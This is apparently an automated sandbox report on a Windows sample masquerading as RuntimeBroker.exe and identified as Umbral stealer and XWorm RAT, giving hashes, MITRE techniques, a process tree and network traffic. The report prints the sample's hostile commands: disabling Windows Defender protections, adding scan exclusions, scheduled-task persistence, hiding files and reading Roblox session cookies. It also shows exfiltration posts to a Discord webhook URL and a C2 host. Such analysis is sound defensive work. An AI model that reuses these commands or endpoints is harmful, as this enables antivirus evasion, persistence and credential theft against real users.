umbral | 2b80a0860ed3b8e262f242f251839d513808829fc3e209b93d2048c272ccc205

Analysis

max time kernel
147s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22/09/2024, 17:57 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RuntimeBroker.exe
Size

346KB
MD5

6a983258dfa7b270cc0938e4c453f66a
SHA1

21cb0158a55a859552fbfe442b7e7ca04c3dd77f
SHA256

2b80a0860ed3b8e262f242f251839d513808829fc3e209b93d2048c272ccc205
SHA512

7273d35af4e4c590566c9d514a26a24aa71696a94aab0a0bfc30820d6a6e9918044cd0df11c20b9b983b3b30edcfecc76a6e9670bdbb8ab7a7ed48c9d405fef5
SSDEEP

6144:q/cLTw+cOiFUk6Pv6U9yy/J6cIiPx166FpQoO/KzFHT809ii6VfNtvAeB9:q0LdcOiFhXKU6/3zFA09iD1tIeB9

Score

10^/10

umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

expected-schema.gl.at.ply.gg:2980

Attributes

Install_directory
%Userprofile%
install_file
USB.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023477-17.dat	family_umbral
behavioral2/memory/3300-30-0x0000020D35780000-0x0000020D357C0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023473-6.dat	family_xworm
behavioral2/memory/2888-29-0x0000000000540000-0x000000000055A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1748	powershell.exe
4508	powershell.exe
5076	powershell.exe
3088	powershell.exe
2212	powershell.exe
1412	powershell.exe
2924	powershell.exe
3208	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbrall.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk	RuntimeBroker.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk	RuntimeBroker.exe

Executes dropped EXE 6 IoCs

pid	Process
2888	RuntimeBroker.exe
3300	Umbrall.exe
1080	SynsWave.exe
3036	RuntimeBroker
1808	RuntimeBroker
2448	RuntimeBroker

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\RuntimeBroker"	RuntimeBroker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
19	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4276	PING.EXE
2672	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2856	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4276	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
376	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3300	Umbrall.exe
1748	powershell.exe
1748	powershell.exe
1412	powershell.exe
1412	powershell.exe
2924	powershell.exe
2924	powershell.exe
4672	powershell.exe
4672	powershell.exe
4508	powershell.exe
4508	powershell.exe
5076	powershell.exe
5076	powershell.exe
3088	powershell.exe
3208	powershell.exe
3088	powershell.exe
3208	powershell.exe
2212	powershell.exe
2212	powershell.exe
2888	RuntimeBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2888	RuntimeBroker.exe
Token: SeDebugPrivilege	3300	Umbrall.exe
Token: SeIncreaseQuotaPrivilege	1808	wmic.exe
Token: SeSecurityPrivilege	1808	wmic.exe
Token: SeTakeOwnershipPrivilege	1808	wmic.exe
Token: SeLoadDriverPrivilege	1808	wmic.exe
Token: SeSystemProfilePrivilege	1808	wmic.exe
Token: SeSystemtimePrivilege	1808	wmic.exe
Token: SeProfSingleProcessPrivilege	1808	wmic.exe
Token: SeIncBasePriorityPrivilege	1808	wmic.exe
Token: SeCreatePagefilePrivilege	1808	wmic.exe
Token: SeBackupPrivilege	1808	wmic.exe
Token: SeRestorePrivilege	1808	wmic.exe
Token: SeShutdownPrivilege	1808	wmic.exe
Token: SeDebugPrivilege	1808	wmic.exe
Token: SeSystemEnvironmentPrivilege	1808	wmic.exe
Token: SeRemoteShutdownPrivilege	1808	wmic.exe
Token: SeUndockPrivilege	1808	wmic.exe
Token: SeManageVolumePrivilege	1808	wmic.exe
Token: 33	1808	wmic.exe
Token: 34	1808	wmic.exe
Token: 35	1808	wmic.exe
Token: 36	1808	wmic.exe
Token: SeIncreaseQuotaPrivilege	1808	wmic.exe
Token: SeSecurityPrivilege	1808	wmic.exe
Token: SeTakeOwnershipPrivilege	1808	wmic.exe
Token: SeLoadDriverPrivilege	1808	wmic.exe
Token: SeSystemProfilePrivilege	1808	wmic.exe
Token: SeSystemtimePrivilege	1808	wmic.exe
Token: SeProfSingleProcessPrivilege	1808	wmic.exe
Token: SeIncBasePriorityPrivilege	1808	wmic.exe
Token: SeCreatePagefilePrivilege	1808	wmic.exe
Token: SeBackupPrivilege	1808	wmic.exe
Token: SeRestorePrivilege	1808	wmic.exe
Token: SeShutdownPrivilege	1808	wmic.exe
Token: SeDebugPrivilege	1808	wmic.exe
Token: SeSystemEnvironmentPrivilege	1808	wmic.exe
Token: SeRemoteShutdownPrivilege	1808	wmic.exe
Token: SeUndockPrivilege	1808	wmic.exe
Token: SeManageVolumePrivilege	1808	wmic.exe
Token: 33	1808	wmic.exe
Token: 34	1808	wmic.exe
Token: 35	1808	wmic.exe
Token: 36	1808	wmic.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeIncreaseQuotaPrivilege	1628	wmic.exe
Token: SeSecurityPrivilege	1628	wmic.exe
Token: SeTakeOwnershipPrivilege	1628	wmic.exe
Token: SeLoadDriverPrivilege	1628	wmic.exe
Token: SeSystemProfilePrivilege	1628	wmic.exe
Token: SeSystemtimePrivilege	1628	wmic.exe
Token: SeProfSingleProcessPrivilege	1628	wmic.exe
Token: SeIncBasePriorityPrivilege	1628	wmic.exe
Token: SeCreatePagefilePrivilege	1628	wmic.exe
Token: SeBackupPrivilege	1628	wmic.exe
Token: SeRestorePrivilege	1628	wmic.exe
Token: SeShutdownPrivilege	1628	wmic.exe
Token: SeDebugPrivilege	1628	wmic.exe
Token: SeSystemEnvironmentPrivilege	1628	wmic.exe
Token: SeRemoteShutdownPrivilege	1628	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2888	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 3644 wrote to memory of 2888	3644	RuntimeBroker.exe	84
PID 3644 wrote to memory of 2888	3644	RuntimeBroker.exe	84
PID 3644 wrote to memory of 3300	3644	RuntimeBroker.exe	85
PID 3644 wrote to memory of 3300	3644	RuntimeBroker.exe	85
PID 3644 wrote to memory of 1080	3644	RuntimeBroker.exe	86
PID 3644 wrote to memory of 1080	3644	RuntimeBroker.exe	86
PID 1080 wrote to memory of 1896	1080	SynsWave.exe	88
PID 1080 wrote to memory of 1896	1080	SynsWave.exe	88
PID 3300 wrote to memory of 1808	3300	Umbrall.exe	89
PID 3300 wrote to memory of 1808	3300	Umbrall.exe	89
PID 3300 wrote to memory of 4168	3300	Umbrall.exe	92
PID 3300 wrote to memory of 4168	3300	Umbrall.exe	92
PID 3300 wrote to memory of 1748	3300	Umbrall.exe	94
PID 3300 wrote to memory of 1748	3300	Umbrall.exe	94
PID 3300 wrote to memory of 1412	3300	Umbrall.exe	96
PID 3300 wrote to memory of 1412	3300	Umbrall.exe	96
PID 3300 wrote to memory of 2924	3300	Umbrall.exe	100
PID 3300 wrote to memory of 2924	3300	Umbrall.exe	100
PID 3300 wrote to memory of 4672	3300	Umbrall.exe	102
PID 3300 wrote to memory of 4672	3300	Umbrall.exe	102
PID 2888 wrote to memory of 4508	2888	RuntimeBroker.exe	105
PID 2888 wrote to memory of 4508	2888	RuntimeBroker.exe	105
PID 3300 wrote to memory of 1628	3300	Umbrall.exe	107
PID 3300 wrote to memory of 1628	3300	Umbrall.exe	107
PID 2888 wrote to memory of 5076	2888	RuntimeBroker.exe	109
PID 2888 wrote to memory of 5076	2888	RuntimeBroker.exe	109
PID 3300 wrote to memory of 4244	3300	Umbrall.exe	111
PID 3300 wrote to memory of 4244	3300	Umbrall.exe	111
PID 3300 wrote to memory of 1524	3300	Umbrall.exe	113
PID 3300 wrote to memory of 1524	3300	Umbrall.exe	113
PID 2888 wrote to memory of 3088	2888	RuntimeBroker.exe	115
PID 2888 wrote to memory of 3088	2888	RuntimeBroker.exe	115
PID 3300 wrote to memory of 3208	3300	Umbrall.exe	117
PID 3300 wrote to memory of 3208	3300	Umbrall.exe	117
PID 3300 wrote to memory of 2856	3300	Umbrall.exe	119
PID 3300 wrote to memory of 2856	3300	Umbrall.exe	119
PID 2888 wrote to memory of 2212	2888	RuntimeBroker.exe	121
PID 2888 wrote to memory of 2212	2888	RuntimeBroker.exe	121
PID 3300 wrote to memory of 2672	3300	Umbrall.exe	123
PID 3300 wrote to memory of 2672	3300	Umbrall.exe	123
PID 2672 wrote to memory of 4276	2672	cmd.exe	125
PID 2672 wrote to memory of 4276	2672	cmd.exe	125
PID 2888 wrote to memory of 376	2888	RuntimeBroker.exe	126
PID 2888 wrote to memory of 376	2888	RuntimeBroker.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4168	attrib.exe

C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\RuntimeBroker'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2212
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\RuntimeBroker"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:376
- C:\Users\Admin\AppData\Roaming\Umbrall.exe
  "C:\Users\Admin\AppData\Roaming\Umbrall.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbrall.exe"
    3⤵
    - Views/modifies file attributes
    PID:4168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbrall.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4244
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3208
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2856
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbrall.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4276
- C:\Users\Admin\AppData\Roaming\SynsWave.exe
  "C:\Users\Admin\AppData\Roaming\SynsWave.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1896

C:\Users\Admin\RuntimeBroker
C:\Users\Admin\RuntimeBroker
1⤵
- Executes dropped EXE
PID:3036

C:\Users\Admin\RuntimeBroker
C:\Users\Admin\RuntimeBroker
1⤵
- Executes dropped EXE
PID:1808

C:\Users\Admin\RuntimeBroker
C:\Users\Admin\RuntimeBroker
1⤵
- Executes dropped EXE
PID:2448

Network

DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

gstatic.com

Umbrall.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.187.195
GET

https://gstatic.com/generate_204

Umbrall.exe

Remote address:

142.250.187.195:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Sun, 22 Sep 2024 17:57:38 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

ip-api.com

RuntimeBroker.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

Umbrall.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 22 Sep 2024 17:57:39 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

RuntimeBroker.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

RuntimeBroker.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 22 Sep 2024 17:57:41 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/json/?fields=225545

Umbrall.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sun, 22 Sep 2024 17:57:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 161
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

Umbrall.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl

Umbrall.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 940
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 22 Sep 2024 17:57:43 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=2abe46d2790c11efbd120e96c2d239db; Expires=Fri, 21-Sep-2029 17:57:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1727027864
x-ratelimit-reset-after: 1
via: 1.1 google
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lbcsUvmUiT37GvGQ3Ghu7wLioi75t2LdG5oi%2FX5rbnw5xye0uRlnktksQ3VCXPLXL9We7iB4pAJU2hnlXbvnAsOKmLsmsHilA0NUH%2BYf1OQb2RG33M%2B5MVZTl3gT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=2abe46d2790c11efbd120e96c2d239db142ecbb9927f026e6bf8166c06234089e0d1181a2e16f97ae6830c0723dff70e; Expires=Fri, 21-Sep-2029 17:57:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=5c5e315134288c214045109a6af50adcd6142e39-1727027863; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=WEGo2upSsIvOmtzVL_8.yv8H41WnnkWzmSbY7IQwHgM-1727027863611-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c742dd1a96bbd74-LHR
POST

https://discord.com/api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl

Umbrall.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="c9bcf801-62d3-4206-b6d8-0776b92187ef"
Host: discord.com
Cookie: __dcfduid=2abe46d2790c11efbd120e96c2d239db; __sdcfduid=2abe46d2790c11efbd120e96c2d239db142ecbb9927f026e6bf8166c06234089e0d1181a2e16f97ae6830c0723dff70e; __cfruid=5c5e315134288c214045109a6af50adcd6142e39-1727027863; _cfuvid=WEGo2upSsIvOmtzVL_8.yv8H41WnnkWzmSbY7IQwHgM-1727027863611-0.0.1.1-604800000
Content-Length: 206464
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Sun, 22 Sep 2024 17:57:44 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1727027865
x-ratelimit-reset-after: 1
via: 1.1 google
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FpA3f8toejcqsXKF8PKxVWDsGsUNFJxd%2BUIhdRuA3s%2F1zvcW7HHNnmja0%2BbmsiwmXmYqDPlGbyVN9moJoT2DNs4DsKHuLnnIjhLGCFx9E0W3X8Jv3ldGCsqpVx1B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 8c742dd3ecacbd74-LHR
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

Remote address:

8.8.8.8:53

Request

expected-schema.gl.at.ply.gg

IN A

Response

expected-schema.gl.at.ply.gg

IN A

147.185.221.20
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response

142.250.187.195:443

https://gstatic.com/generate_204

tls, http

Umbrall.exe

770 B
4.9kB
9
8

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Umbrall.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

RuntimeBroker.exe

356 B
347 B
6
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Umbrall.exe

285 B
550 B
5
5

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.136.232:443

https://discord.com/api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl

tls, http

Umbrall.exe

215.9kB
8.8kB
165
78

HTTP Request

POST https://discord.com/api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl

HTTP Response

404

HTTP Request

POST https://discord.com/api/webhooks/1287360783734411274/Muly1yjywcFg321yTLGVUf6Ilh44xbfhxhT17VnDw6_iOfAw6PaTOvV1EsNLG7xaTeEl

HTTP Response

404
147.185.221.20:2980

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

260 B
5
147.185.221.20:2980

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

260 B
5
147.185.221.20:2980

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

260 B
5
147.185.221.20:2980

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

260 B
5
147.185.221.20:2980

expected-schema.gl.at.ply.gg

RuntimeBroker.exe

260 B
5

8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

Umbrall.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.187.195
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

195.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.187.250.142.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

RuntimeBroker.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

RuntimeBroker.exe

